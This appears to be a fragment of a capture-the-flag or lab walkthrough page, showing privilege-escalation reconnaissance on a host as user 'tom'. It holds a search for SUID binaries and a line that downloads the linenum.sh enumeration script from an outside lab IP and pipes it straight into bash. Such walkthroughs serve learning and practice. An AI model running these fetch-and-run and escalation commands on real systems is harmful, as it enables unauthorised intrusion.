tom

find / -type f -perm -04000 -ls 2>/dev/null
curl http://10.10.14.6/linenum.sh | bash

Looks like it will run a command (system command) as a child process then delete the task

Last updated

Was this helpful?